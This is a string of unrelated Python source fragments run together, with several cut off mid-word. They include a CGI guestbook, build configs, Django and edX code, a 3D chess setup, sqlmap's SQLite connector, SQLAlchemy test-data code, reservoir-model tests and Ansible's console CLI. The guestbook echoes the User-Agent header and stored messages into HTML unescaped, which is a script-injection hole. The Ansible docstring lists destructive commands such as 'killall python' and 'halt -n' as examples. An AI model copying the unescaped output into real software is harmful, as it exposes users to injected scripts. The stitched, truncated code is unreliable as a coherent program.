send_command('mget', *keys) vals = conn.read_response() ret += "<h2>" + "Message log" + "</h2>" for k, v in zip(keys, vals): ret += "<span>" + k.replace(msg_prefix, '').replace('--', ' ') + "</span>" ret += "<pre readonly=\"true\">" + v + "</pre>" conn.disconnect() ret += "<br>" return ret def reply(): import time, os ret = "" ret += "Content-Type: text/html\n\n" ret += "<!DOCTYPE html>" ret += "<html>" ret += default_head(title) ret += default_navigator() ret += "<body>" ret += "<div class=\"content\">" ret += "<h2>Welcome, " + os.environ["REMOTE_ADDR"] + "!</h2>" ret += "<span>" + os.environ["HTTP_USER_AGENT"] + "</span><br><br>" if fields.has_key('msgbox'): insert_msg(os.environ["REMOTE_ADDR"], time.strftime(time.asctime()), fields['msgbox'].value) ret += read_msg() ret += "</div>" ret += "</body>" ret += "</html>" print ret reply()
# License LGPL-3.0 or later
(http://www.gnu.org/licenses/lgpl). fr
om . import controllers
impor
t struct import unittest from zoonado.protocol import response, primitives class ResponseTests(unittest.TestCase): def test_deserialize(self): class FakeResponse(response.Response): opcode = 99 parts = ( ("first", primitives.Int), ("second", primitives.UString), )
# note that the xid and opcode are omitted, they're part of a preamble # that a connection would use to determine which Response to use # for deserializing raw = struct.pack("!ii6s", 3, 6, b"foobar") result = FakeResponse.deserialize(raw) self.assertEqual(result.first, 3) self.assertEqual(result.second, u"foobar")
import os MOZ_OBJDIR = 'obj-firefox' config = { 'default_actions': [ 'clobber', 'clone-tools', 'checkout-sources', #'setup-mock', 'build', #'upload-files', #'sendchange', 'check-test', 'va
lgrind-test', #'generate-build-stats', #'update', ], 'stage_platform': 'linux64-va
lgrind', 'publish_nightly_en_US_routes': False, 'build_type': 'valgrind', 'tooltool_manifest_src': "browser/config/tooltool-manifests/linux64/\ releng.manifest", 'platform_supports_post_upload_to_latest': False, 'enable_signing': False, 'enable_talos_sendchange': False, 'perfherder_extra_options': ['valgrind'], #### 64 bit build specific ##### 'env': { 'MOZBUILD_STATE_PATH': os.path.join(os.getcwd(), '.mozbuild'), 'MOZ_AUTOMATION': '1', 'DISPLAY': ':2', 'HG_SHARE_BASE_DIR': '/builds/hg-shared', 'MOZ_OBJDIR': 'obj-firefox', 'TINDERBOX_OUTPUT': '1', 'TOOLTOOL_CACHE': '/builds/tooltool_cache', 'TOOLTOOL_HOME': '/builds', 'MOZ_CRASHREPORTER_NO_REPORT': '1', 'CCACHE_DIR': '/builds/ccache', 'CCACHE_COMPRESS': '1', 'CCACHE_UMASK': '002', 'LC_ALL': 'C', ## 64 bit specific 'PATH': '/tools/buildbot/bin:/usr/local/bin:/usr/lib64/ccache:/bin:\ /usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/tools/git/bin:/tools/python27/bin:\ /tools/python27-mercurial/bin:/home/cltbld/bin', }, 'src_mozconfig': 'browser/config/mozconfigs/linux64/valgrind', ####################### }
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('training', '0006_auto_20160627_1620'), ] operations = [ migrations.RemoveField( model_name='trainesscourserecor
d', name='approvedby', ), migrations.RemoveField( model_name='trainesscourserecord',
name='createdby', ), migrations.RemoveField( model_name='trainesscourserecord', name='createtimestamp', ), ]
""" Proctored Exams Transformer """ from django.conf import settings from edx_proctoring.api import get_attempt_status_summary from edx_proctoring.models import ProctoredExamStudentAttemptStatus from openedx.core.lib.block_structur
e.transformer import BlockStructureTransformer, FilteringTransformerMixin class ProctoredExamTransformer(FilteringTransformerMixin, BlockStructureTransformer): """ Exclude proctored exams unless the user is not a verified student or has declined taking the exam. """ VERSION = 1 BLOCK_HAS_PROCTORED_EXAM = 'has_proctored_exam' @classmethod def name(cls): return "proctored_exam" @classmethod def collect(cls, block_structure): """ Compu
tes any information for each XBlock that's necessary to execute this transformer's transform method. Arguments: block_structure (BlockStructureCollectedData) """ block_structure.request_xblock_fields('is_proctored_enabled') block_structure.request_xblock_fields('is_practice_exam') def transform_block_filters(self, usage_info, block_structure): if not settings.FEATURES.get('ENABLE_PROCTORED_EXAMS', False): return [block_structure.create_universal_filter()] def is_proctored_exam_for_user(block_key): """ Test whether the block is a proctored exam for the user in question. """ if ( block_key.block_type == 'sequential' and ( block_structure.get_xblock_field(block_key, 'is_proctored_enabled') or block_structure.get_xblock_field(block_key, 'is_practice_exam') ) ): # This section is an exam. It should be excluded unless the # user is not a verified student or has declined taking the exam. user_exam_summary = get_attempt_status_summary( usage_info.user.id, unicode(block_key.course_key), unicode(block_key), ) return user_exam_summary and user_exam_summary['status'] != ProctoredExamStudentAttemptStatus.declined return [block_structure.create_removal_filter(is_proctored_exam_for_user)]
from panda3d.core import LPoint3 # EDIT GAMEMODE AT THE BOTTOM (CHESS VARIANTS) # COLORS (for the squares) BLACK = (0, 0, 0, 1) WHITE = (1, 1, 1, 1) HIGHLIGHT = (0, 1, 1, 1) HIGHLIGHT_MOVE = (0, 1, 0, 1) HIGHLIGHT_ATTACK = (1, 0, 0, 1) # SCALE (for the 3D representation) SCALE = 0.5 PIECE_SCALE = 0.3 BOARD_HEIGHT = 1.5 # MODELS MODEL_PAWN = "models/pawn.obj" MODEL_ROOK = "models/rook.obj" MODEL_KNIGHT = "models/knight.obj" MODEL_BISHOP = "models/bishop.obj" MODEL_QUEEN = "models/queen.obj" MODEL_KING = "models/king.obj" MODEL_UNICORN = "models/unicorn.obj" # MODEL TEXTURES TEXTURE_WHITE = "models/light_wood.jpg" TEXTURE_BLACK = "models/dark_wood.jpg" # HELPER FUNCTIONS def square_position(x, y, z, board_size): # Gives the 3d position of a square based on x, y, z xx, yy, zz = board_size x = (x - (3.5/8)*xx) * SCALE y = (y - (3.5/8)*yy) * SCALE z = z*BOARD_HEIGHT * SCALE return LPoint3(x, y, z) def square_color(x, y, z): # Checks whether a square should be black or white if (x+y+z) % 2 == 0: return BLACK else: return WHITE # BOARDS # 1 = Pawn # 2 = Rook # 3 = Knight # 4 = Bishop # 5 = Queen # 6 = King # 7 = Unicorn # + = white # - = black # First array = lowest level # Highest part of the array = front (white pieces) PIECES = { 0: 'empty space', -1: 'black pawn', -2: 'black rook', -3: 'black knight', -4: 'black bishop', -5: 'black queen', -6: 'black king', -7: 'black unicorn', 1: 'white pawn', 2: 'white rook', 3: 'white knight', 4: 'white bishop', 5: 'white queen', 6: 'white king', 7: 'white unicorn', } RAUMSCHACH_PAWN_2STEP = False RAUMSCHACH_BOARD = [ [ [ 2, 3, 6, 3, 2], [ 1, 1, 1, 1, 1], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], ], [ [ 4, 7, 5, 7, 4], [ 1, 1, 1, 1, 1], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], ], [ [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], ], [ [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [-1,-1,-1,-1,-1], [-4,-7,-5,-7,-4], ], [ [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [-1,-1,-1,-1,-1], [-2,-3,-6,-3,-2], ], ] SMALL_RAUMSCHACH_PAWN_2STEP = False SMALL_RAUMSCHACH_BOARD = [ [ [ 2, 4, 6, 4, 2], [ 3, 1, 1, 1, 3], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], ], [ [ 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], ], [ [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0], [-3,-1,-1,-1,-3], [-2,-4,-6,-4,-2], ], ] CARD_PAWN_2STEP = True CARD_BOARD = [ [ [ 2, 5, 6, 2], [ 1, 1, 1, 1], [
0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], ], [ [ 4, 3, 3, 4], [ 1, 1, 1, 1], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [-1,-1,-1,-1], [-4,-3,-3,-4], ], [ [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [ 0, 0, 0, 0], [-1,-1,-1,-1], [-2,-5,-6,-2], ], ] CLASSIC_PAWN_2STEP = True CLASSIC_BOARD = [ [ [ 2, 3, 4, 5, 6, 4, 3, 2], [ 1, 1, 1, 1, 1, 1, 1, 1], [ 0, 0, 0, 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0, 0, 0, 0], [ 0, 0, 0, 0, 0, 0, 0, 0], [-1,-1,-1,-1,-1,-1,-1,-1], [-2,-3,-4,-5,-6,-4,-3,-2], ], ] # NOTE: PAWN_2STEP is whether the pawn can take 2 steps if it's on the second line (bool) RAUMSCHACH = (RAUMSCHACH_BOARD, RAUMSCHACH_PAWN_2STEP) SMALL_RAUMSCHACH = (SMALL_RAUMSCHACH_BOARD, SMALL_RAUMSCHACH_PAWN_2STEP) CARD = (CARD_BOARD, CARD_PAWN_2STEP) CLASSIC = (CLASSIC_BOARD, CLASSIC_PAWN_2STEP) TEST_PAWN_2STEP = True TEST_BOARD = [ [ [ 0, 1, 6, 0], [ 0, 0, 0, 0], [ 0, 0,-2,-2], [ 0, 0, 0, 0], ], [ [ 0, 1, 6, 0], [ 0, 0, 0, 0], [ 0, 0,-2,-2], [ 0, 0, 0, 0], ], ] TEST = (TEST_BOARD, TEST_PAWN_2STEP) # Edit gamemode here GAMEMODE = SMALL_RAUMSCHACH # Edit players here HUMANS = (1, ) AIS = (-1, ) BOARD, PAWN_2STEP = GAMEMODE BOARD_SIZE = (len(BOARD[0][0]), len(BOARD[0]), len(BOARD)) TEST = True
#!/usr/bin/env python """ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ try: import sqlite3 except ImportError: pass import logging from
lib.core.convert impo
rt utf8encode from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite User guide: http://docs.python.org/release/2.5/lib/module-sqlite3.html API: http://docs.python.org/library/sqlite3.html Debian package: python-sqlite (SQLite 2), python-pysqlite3 (SQLite 3) License: MIT Possible connectors: http://wiki.python.org/moin/SQLite """ def __init__(self): GenericConnector.__init__(self) self.__sqlite = sqlite3 def connect(self): self.initConnection() self.checkFileDb() try: self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) cursor = self.connector.cursor() cursor.execute("SELECT * FROM sqlite_master") cursor.close() except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" logger.warn(warnMsg) try: try: import sqlite except ImportError: errMsg = "sqlmap requires 'python-sqlite' third-party library " errMsg += "in order to directly connect to the database '%s'" % self.db raise SqlmapMissingDependence(errMsg) self.__sqlite = sqlite self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: raise SqlmapConnectionException(msg[0]) self.initCursor() self.printConnected() def fetchall(self): try: return self.cursor.fetchall() except self.__sqlite.OperationalError, msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) return None def execute(self, query): try: self.cursor.execute(utf8encode(query)) except self.__sqlite.OperationalError, msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) except self.__sqlite.DatabaseError, msg: raise SqlmapConnectionException(msg[0]) self.connector.commit() def select(self, query): self.execute(query) return self.fetchall()
T, Float, INT, INTEGER, Integer, NCHAR, NVARCHAR, NUMERIC, Numeric, SMALLINT, SmallInteger, String, TEXT, TIME, Text, Time, Unicode, UnicodeText, VARCHAR, Enum) from .. import mix_types as t from ..main import ( SKIP_VALUE, LOGGER, TypeMixer as BaseTypeMixer, GenFactory as BaseFactory, Mixer as BaseMixer, partial, faker) class GenFactory(BaseFactory): """ Map a sqlalchemy classes to simple types. """ types = { (String, VARCHAR, Unicode, NVARCHAR, NCHAR, CHAR): str, (Text, UnicodeText, TEXT): t.Text, (Boolean, BOOLEAN): bool, (Date, DATE): datetime.date, (DateTime, DATETIME): datetime.datetime, (Time, TIME): datetime.time, (DECIMAL, Numeric, NUMERIC): decimal.Decimal, (Float, FLOAT): float, (Integer, INTEGER, INT): int, (BigInteger, BIGINT): t.BigInteger, (SmallInteger, SMALLINT): t.SmallInteger, } class TypeMixer(BaseTypeMixer): """ TypeMixer for SQLAlchemy. """ factory = GenFactory def __init__(self, cls, **params): """ Init TypeMixer and save the mapper. """ super(TypeMixer, self).__init__(cls, **params) self.mapper = self.__scheme._sa_class_manager.mapper def postprocess(self, target, postprocess_values): """ Fill postprocess values. """ mixed = [] for name, deffered in postprocess_values: value = deffered.value if isinstance(value, GeneratorType): value = next(value) if isinstance(value, t.Mix): mixed.append((name, value)) continue if isinstance(getattr(target, name), InstrumentedList) and not isinstance(value, list): value = [value] setattr(target, name, value) for name, mix in mixed: setattr(target, name, mix & target) if self.__mixer: target = self.__mixer.postprocess(target) return target @staticmethod def get_default(field): """ Get default value from field. :return va
lue: A default value or NO_VALUE """ column = field.scheme if isinstance(column, RelationshipProperty): column = column.local_remote_pairs[0][0] if not column.default: return SKIP_VALUE if column.default.is_callable: return column.default.arg(None) return getattr(column.default, 'arg', SKIP_VALUE) def gen_select(self, field_name, select): """ Select exi
sts value from database. :param field_name: Name of field for generation. :return : None or (name, value) for later use """ if not self.__mixer or not self.__mixer.params.get('session'): return field_name, SKIP_VALUE relation = self.mapper.get_property(field_name) session = self.__mixer.params.get('session') value = session.query( relation.mapper.class_ ).filter(*select.choices).order_by(func.random()).first() return self.get_value(field_name, value) @staticmethod def is_unique(field): """ Return True is field's value should be a unique. :return bool: """ scheme = field.scheme if isinstance(scheme, RelationshipProperty): scheme = scheme.local_remote_pairs[0][0] return scheme.unique @staticmethod def is_required(field): """ Return True is field's value should be defined. :return bool: """ column = field.scheme if isinstance(column, RelationshipProperty): column = column.local_remote_pairs[0][0] if field.params: return True # According to the SQLAlchemy docs, autoincrement "only has an effect for columns which are # Integer derived (i.e. INT, SMALLINT, BIGINT) [and] Part of the primary key [...]". return not column.nullable and not (column.autoincrement and column.primary_key and isinstance(column.type, Integer)) def get_value(self, field_name, field_value): """ Get `value` as `field_name`. :return : None or (name, value) for later use """ field = self.__fields.get(field_name) if field and isinstance(field.scheme, RelationshipProperty): return field_name, t._Deffered(field_value, field.scheme) return super(TypeMixer, self).get_value(field_name, field_value) def make_fabric(self, column, field_name=None, fake=False, kwargs=None): # noqa """ Make values fabric for column. :param column: SqlAlchemy column :param field_name: Field name :param fake: Force fake data :return function: """ kwargs = {} if kwargs is None else kwargs if isinstance(column, RelationshipProperty): return partial(type(self)( column.mapper.class_, mixer=self.__mixer, fake=self.__fake, factory=self.__factory ).blend, **kwargs) ftype = type(column.type) # augmented types created with TypeDecorator # don't directly inherit from the base types if TypeDecorator in ftype.__bases__: ftype = ftype.impl stype = self.__factory.cls_to_simple(ftype) if stype is str: fab = super(TypeMixer, self).make_fabric( stype, field_name=field_name, fake=fake, kwargs=kwargs) return lambda: fab()[:column.type.length] if ftype is Enum: return partial(faker.random_element, column.type.enums) return super(TypeMixer, self).make_fabric( stype, field_name=field_name, fake=fake, kwargs=kwargs) def guard(self, *args, **kwargs): """ Look objects in database. :returns: A finded object or False """ try: session = self.__mixer.params.get('session') assert session except (AttributeError, AssertionError): raise ValueError('Cannot make request to DB.') qs = session.query(self.mapper).filter(*args, **kwargs) count = qs.count() if count == 1: return qs.first() if count: return qs.all() return False def reload(self, obj): """ Reload object from database. """ try: session = self.__mixer.params.get('session') session.expire(obj) session.refresh(obj) return obj except (AttributeError, AssertionError): raise ValueError('Cannot make request to DB.') def __load_fields(self): """ Prepare SQLALchemyTypeMixer. Select columns and relations for data generation. """ mapper = self.__scheme._sa_class_manager.mapper relations = set() if hasattr(mapper, 'relationships'): for rel in mapper.relationships: relations |= rel.local_columns yield rel.key, t.Field(rel, rel.key) for key, column in mapper.columns.items(): if column not in relations: yield key, t.Field(column, key) class Mixer(BaseMixer): """ Integration with SQLAlchemy. """ type_mixer_cls = TypeMixer def __init__(self, session=None, commit=True, **params): """Initialize the SQLAlchemy Mixer. :param fake: (True) Generate fake data instead of random data. :param session: SQLAlchemy session. Using for commits. :param commit: (True) Commit instance to session after creation. """ super(Mixer, self).__init__(**params) self.params['session'] = session self.params['commit'] = bool(session) and commit def postprocess(self, target): """ Save objects in db. :return value: A generated value """ if self.params.get('commit'): session = self.params.get('session') if not session: LOGGER.warn("'commit' set true but session not initialized.") else: session.add(target)
# Copyright 2015 Cedraro Andrea <a.cedraro@gmail.com> # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permi
ssions and # limitations under the License. import sys if sys.version_info[0] >= 3: basestring = str unicode = str def encode_string( value ): return value.encode('utf-8') if isinstance(value, unicode) else value
def decode_string(value): return value if isinstance(value, basestring) else value.decode('utf-8') # hmac.compare_digest were introduced in python 2.7.7 if sys.version_info >= ( 2, 7, 7 ): from hmac import compare_digest as SecureStringsEqual else: # This is the compare_digest function from python 3.4, adapted for 2.6: # http://hg.python.org/cpython/file/460407f35aa9/Lib/hmac.py#l16 # # Stolen from https://github.com/Valloric/ycmd def SecureStringsEqual( a, b ): """Returns the equivalent of 'a == b', but avoids content based short circuiting to reduce the vulnerability to timing attacks.""" # Consistent timing matters more here than data type flexibility if not ( isinstance( a, str ) and isinstance( b, str ) ): raise TypeError( "inputs must be str instances" ) # We assume the length of the expected digest is public knowledge, # thus this early return isn't leaking anything an attacker wouldn't # already know if len( a ) != len( b ): return False # We assume that integers in the bytes range are all cached, # thus timing shouldn't vary much due to integer object creation result = 0 for x, y in zip( a, b ): result |= ord( x ) ^ ord( y ) return result == 0 def compare_digest( a, b ): return SecureStringsEqual( a, b )
import unittest import sys import numpy as np from opm.util import EModel try: from tests.utils import test_path except ImportError: from utils import test_path class TestEModel(unittest.TestCase): def test_open_model(self): refArrList = ["PORV", "CELLVOL", "DEPTH", "DX", "DY", "DZ", "PORO", "PERMX", "PERMY", "PERMZ", "NTG", "TRANX", "TRANY", "TRANZ", "ACTNUM", "ENDNUM", "EQLNUM", "FIPNUM", "FLUXNUM", "IMBNUM", "PVTNUM", "SATNUM", "SWL", "SWCR", "SGL", "SGU", "ISWL", "ISWCR", "ISGL", "ISGU", "PPCW", "PRESSURE", "RS", "RV", "SGAS", "SWAT", "SOMAX", "SGMAX"] self.assertRaises(RuntimeError, EModel, "/file/that/does_not_exists") self.assertRaises(ValueError, EModel, test_path("data/9_EDITNNC.EGRID")) self.assertRaises(ValueError, EModel, test_path("data/9_EDITNNC.UNRST")) mod1 = EModel(test_path("data/9_EDITNNC.INIT")) arrayList = mod1.get_list_of_arrays() for n, element in enumerate(arrayList): self.assertEqual(element[0], refArrList[n]) celvol1 = mod1.get("CELLVOL") self.assertEqual(len(celvol1), 2794) def test_add_filter(self): mod1 = EModel(test_path("data/9_EDITNNC.INIT")) celvol1 = mod1.get("CELLVOL") depth1 = mod1.get("DEPTH") self.assertTrue(isinstance(celvol1, np.ndarray)) self.assertEqual(celvol1.dtype, "float32") refVol1 = 2.79083e8 self.assertTrue( abs((sum(celvol1) - refVol1)/refVol1) < 1.0e-5) mod1.add_filter("EQLNUM","eq", 1); mod1.add_filter("DEPTH","lt", 2645.21); refVol2 = 1.08876e8 refPorvVol2 = 2.29061e7 porv2 = mod1.get("PORV") celvol2 = mod1.get("CELLVOL") self.assertTrue( abs((sum(celvol2) - refVol2)/refVol2) < 1.0e-5) self.assertTrue( abs((sum(porv2) - refPorvVol2)/refPorvVol2) < 1.0e-5) mod1.reset_filter() mod1.add_filter("EQLNUM","eq", 2); mod1.add_filter("DEPTH","in", 2584.20, 2685.21); refPorvVol3 = 3.34803e7 porv3 = mod1.get("PORV") self.assertTrue( abs((sum(porv3) - refPorvVol3)/refPorvVol3) < 1.0e-5) mod1.reset_filter() mod1.add_filter("I","lt", 10); mod1.add_filter("J","between", 3, 15); mod1.add_filter("K","between", 2, 9); poro = mod1.get("PORO") self.assertEqual(len(poro), 495) def test_paramers(self): mod1 = EModel(test_path("data/9_EDITNNC.INIT")) self.assertFalse("XXX" in mod1) self.assertTrue("PORV" in mod1) self.assertTrue("PRESSURE" in mod1) self.assertTrue("RS" in mod1) self.assertTrue("RV" in mod1) self.assertEqual(mod1.active_report_step(), 0) rsteps = mod1.get_report_steps() self.assertEqual(rsteps, [0, 4, 7, 10, 15, 20, 27, 32, 36, 39]) mod1.set_report_step(7) # parameter RS and RV is missing in report step number 7 self.assertFalse("RS" in mod1) self.assertFalse("RV" in mod1) mod1.set_report_step(15) self.assertTrue("RS" in mod1) self.assertTrue("RV" in mod1) arrayList = mod1.get_list_of_arrays() def test_rsteps_steps(self): pres_ref_4_1_10 = [272.608, 244.461, 228.503, 214.118, 201.147, 194.563, 178.02, 181.839, 163.465, 148.677] mod1 = EModel(test_path("data/9_EDITNNC.INIT")) mod1.add_filter("I","eq", 4); mod1.add_filter("J","eq", 1); mod1.add_filter("K","eq", 10); self.assertTrue(mod1.has_report_step(4)) self.assertFalse(mod1.has_report_step(2)) rsteps = mod1.get_report_steps() for n, step in enumerate(rsteps): mod1.set_report_step(step) pres = mod1.get("PRESSURE") self.assertTrue(abs(pres[0] - pres_ref_4_1_10[n])/pres_ref_4_1_10[n] < 1.0e-5) def test_grid_props(self): mod1 = EModel(test_path("data/9_EDITNNC.INIT")) nI,nJ,nK = mod1.grid_dims()
self.assertEqual((nI,nJ,nK), (13, 22, 11)) nAct = mod1.active_cells() self.assertEqual(nAct, 2794) def test_hc_filter(self): nAct_hc_eqln1 = 1090 nAct_hc_eqln2 = 1694 mod1 = EModel(test_path("data/9_EDITNNC.INIT")) porv = mod1.get("PORV") mod1.set_
depth_fwl([2645.21, 2685.21]) mod1.add_hc_filter() porv = mod1.get("PORV") self.assertEqual(len(porv), nAct_hc_eqln1 + nAct_hc_eqln2) mod1.reset_filter() mod1.add_filter("EQLNUM","eq", 1); mod1.add_filter("DEPTH","lt", 2645.21); porv1 = mod1.get("PORV") self.assertEqual(len(porv1), nAct_hc_eqln1) mod1.reset_filter() mod1.add_filter("EQLNUM","eq", 2); mod1.add_filter("DEPTH","lt", 2685.21); porv2 = mod1.get("PORV") self.assertEqual(len(porv2), nAct_hc_eqln2) ivect = mod1.get("I") if __name__ == "__main__": unittest.main()
nicode import to_unicode, to_str from ansible.plugins import module_loader try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class ConsoleCLI(CLI, cmd.Cmd): modules = [] def __init__(self, args): super(ConsoleCLI, self).__init__(args) self.intro = 'Welcome to the ansible console.\nType help or ? to list commands.\n' self.groups = [] self.hosts = [] self.pattern = None self.variable_manager = None self.loader = None self.passwords = dict() self.modules = None cmd.Cmd.__init__(self) def parse(self): self.parser = CLI.base_parser( usage='%prog <host-pattern> [options]', runas_opts=True, inventory_opts=True, connect_opts=True, check_opts=True, vault_opts=True, fork_opts=True, module_opts=True, ) # options unique to shell self.parser.add_option('--step', dest='step', action='store_true', help="one-step-at-a-time: confirm each task before running") self.parser.set_defaults(cwd='*') self.options, self.args = self.parser.parse_args(self.args[1:]) display.verbosity = self.options.verbosity self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True) return True def get_names(self): return dir(self) def cmdloop(self): try: cmd.Cmd.cmdloop(self) except KeyboardInterrupt: self.do_exit(self) def set_prompt(self): login_user = self.options.remote_user or getpass.getuser() self.selected = self.inventory.list_hosts(self.options.cwd) prompt = "%s@%s (%d)[f:%s]" % (login_user, self.options.cwd, len(self.selected), self.options.forks) if self.options.become and self.options.become_user in [None, 'root']: prompt += "# " color = C.COLOR_ERROR else: prompt += "$ " color = C.COLOR_HIGHLIGHT self.prompt = stringc(prompt, color) def list_modules(self): modules = set() if self.options.module_path is not None: for i in self.options.module_path.split(os.pathsep): module_loader.add_directory(i) module_paths = module_loader._get_paths() for path in module_paths: if path is not None: modules.update(self._find_modules_in_path(path)) return modules def _find_modules_in_path(self, path): if os.path.isdir(path): for module in os.listdir(path): if module.startswith('.'): continue elif os.path.isdir(module): self._find_modules_in_path(module) elif module.startswith('__'): continue elif any(module.endswith(x) for x in C.BLACKLIST_EXTS): continue elif module in C.IGNORE_FILES: continue elif module.startswith('_'): fullpath = '/'.join([path,module]) if os.path.islink(fullpath): # avoids aliases continue module = module.replace('_', '', 1) module = os.path.splitext(module)[0] # removes the extension yield module def default(self, arg, forceshell=False): """ actually runs modules """ if arg.startswith("#"): return False if not self.options.cwd: display.error("No host found") return False if arg.split()[0] in self.modules: module = arg.split()[0] module_args = ' '.join(arg.split()[1:]) else: module = 'shell' module_args = arg if forceshell is True: module = 'shell' module_args = arg self.options.module_name = module result = None try: check_raw = self.options.module_name in ('command', 'shell', 'script', 'raw') play_ds = dict( name = "Ansible Shell", hosts = self.options.cwd, gather_facts = 'no', tasks = [ dict(action=dict(module=module, args=parse_kv(module_args, check_raw=check_raw)))] ) play = Play().load(play_ds, variable_manager=self.variable_manager, loader=self.loader) except Exception as e: display.error(u"Unable to build command: %s" % to_unicode(e)) return False try: cb = 'minimal' #FIXME: make callbacks configurable # now create a task queue manager to execute the play self._tqm = None try: self._tqm = TaskQueueManager( inventory=self.inventory, variable_manager=self.variable_manager, loader=self.loader, options=self.options, passwords=self.passwords, stdout_callback=cb, run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS, run_tree=False, ) result = self._tqm.run(play) finally: if self._tqm: self._tqm.cleanup() if self.loader: self.loader.cleanup_all_tmp_files() if result is None: display.error("No hosts found") return False except KeyboardInterrupt: display.error('User interrupted execution') return False except Exception as e: display.error(to_unicode(e)) #FIXME: add traceback in very very verbose mode return False def emptyline(self): return def do_shell(self, arg): """ You can run shell commands through the shell module. eg.: shell ps uax | grep java | wc -l shell killall python shell halt -n You can use the ! to force the shell module. eg.: !ps aux | grep java | wc -l """ self.default(arg, True) def do_forks(self, arg): """Set the number of forks""" if not arg: display.display('Usage: forks <number>') return self.options.forks = int(arg) self.set_prompt() do_serial = do_forks def do_verbosity(self, arg): """Set verbosity level""" if not arg: display.display('Usage: verbosity <number>') else: display.verbosity = int(arg) display.v('verbosity level set to %s' % arg) def do_cd(self, arg): """ Change active host/group. You can use hosts patterns as well eg.: cd webservers
cd webservers:dbservers cd webservers:!phoenix cd webservers:&staging cd webservers:dbservers:&s
taging:!phoenix """ if not arg: self.options.cwd = '*' elif arg == '..': try: self.options.cwd = self.inventory.groups_for_host(self.options.cwd)[1].name except Exception: self.options.cwd = '' elif arg in '/*': self.options.cwd = 'all' elif self.inventory.get_hosts(arg): self.options.cwd = arg else: display.display("no host matched") self.set_prompt() def do_list(self, arg): """List the hosts in the current group""" if arg == 'groups': for group in self.groups: display.display(group) else: for host in self.selected: display.display(host.name) def do_become(self, arg): """Toggle whether plays run with become""" if arg: self.options.become = C.mk_boolean(arg) display.v("become changed to %s" % self.options.beco
from abc import ABCMeta, abstractmethod class ProgressMessage(object): def __init__(self, path, bytes_per_second, bytes_read, bytes_expected): self._path = path self._bytes_per_second = bytes_per_second self._bytes_read = bytes_read self._bytes_expected = bytes_expected @property def path(self): return self._path @property def bytes_per_second(self): return self._bytes_per_second @property def bytes_read(self): return self._bytes_read @property def bytes_expected(self): return self._bytes_expected class BucketFile(object): """ This class defines the contract for a file, that is used across all buckets """ def __init__(self, path, name, folder, contentType=None): self._path = path self._name = name self._folder = folder self._contentType = contentType self._hash = None self._dateModified = None def get_hash(self): return self._hash def set_ha
sh(self, value): self._hash = value def get_dateModified(self): return self._dateModified def set_dateModified(self, value): self._dateModified = valu
e def get_content_type(self): return self._contentType def set_content_type(self, value): self._contentType = value @property def path(self): return self._path @property def name(self): return self._name @property def isFolder(self): return self._folder contentType = property(get_content_type, set_content_type) hash = property(get_hash, set_hash) dateModified = property(get_dateModified, set_dateModified) class AbstractProvider: """ This class defines a contract for all our different storage sources e.g: Amazon S3, Local Files, Openstack Swift etc. etc. """ __metaclass__ = ABCMeta @abstractmethod def delete_object(self, path): return NotImplemented @abstractmethod def list_dir(self, path): return NotImplemented @abstractmethod def authenticate(self): """ Return True is it works, False if it fails """ return False @abstractmethod def download_object(self, sourcePath, targetPath): """ Download source to target """ return NotImplemented
from direct.directnotify import DirectNotifyGlobal from BaseActivityFSM import BaseActivityFSM
from activityFSMMixins import IdleMixin from activityFSMMixins import RulesMixin from activityFSMMixins import ActiveMixin from activityFSMMixins import DisabledMixin from activityFSMMixins import ConclusionMixin from activityFSMMixins import WaitForEnoughMixin from activityFSMMixins import WaitToStartMixin from activit
